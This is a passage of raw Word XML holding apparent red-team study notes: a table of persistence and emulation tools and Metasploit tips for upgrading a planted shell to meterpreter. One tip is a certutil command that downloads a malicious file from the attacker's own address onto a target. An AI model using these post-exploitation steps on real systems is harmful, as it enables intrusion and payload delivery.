        <w:t>| ------------------------- | ---------------------- | -------- |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E3208" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (Persistence) | PowerShell persistence | Internal |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E21433" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>SharPersist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">               | C# persistence realism | Internal |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DEAAF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Atomic Red Team           | Technique validation   | Internal |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7990F33E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| MITRE Caldera             | Full ATT&amp;CK emulation  | Internal |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D09027" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Red Team Automation       | Technique testing      | Internal |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437011D" w14:textId="32E697CB" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>PurpleSharp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">               | AD</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:t>focused realism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:t>| Internal |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3259F3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="1FB1A3C2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7CE41334" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="54C1A7E7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Metasploit tips and tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453260E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- To start the database within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> use: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24E7B876" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Using workspace you can save and come back to other things you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>initailly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> start within it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C4462" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Once A shell has been planted on a system there a few ways to upgrade it to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DF8424F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">        - using: sessions -u {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">} Metasploit will attempt to upgrade it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>iniatly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4814C151" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">        - You can also download it on your target using: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -split -f http://&lt;your_ip&gt;/{Mal.Name} {Mal.name}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F491A7D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">        - Lastly there is a shell to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> function within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: use post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0487F927" w14:textId="77777777" w:rsidR="004933F7" w:rsidRDefault="004933F7"/>
    <w:sectPr w:rsidR="00493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B2"/>
    <w:rsid w:val="003C1D17"/>
    <w:rsid w:val="004933F7"/>
    <w:rsid w:val="006133B2"/>
    <w:rsid w:val="00D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146E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{27273436-DA84-4773-B8B4-8DFF8823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3B2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00613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3B2"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="006133B2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006133B2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="006133B2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00613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3B2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00613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4619</Words>
  <Characters>26331</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>219</Lines>
  <Paragraphs>61</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>T S</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-29T02:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-29T02:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>